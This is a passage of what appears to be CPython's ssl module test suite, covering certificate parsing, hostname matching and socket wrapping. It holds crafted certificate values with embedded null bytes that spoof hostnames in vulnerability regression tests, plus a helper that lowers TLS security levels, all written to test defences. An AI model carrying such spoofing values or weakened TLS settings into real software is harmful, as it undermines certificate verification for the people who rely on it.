(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
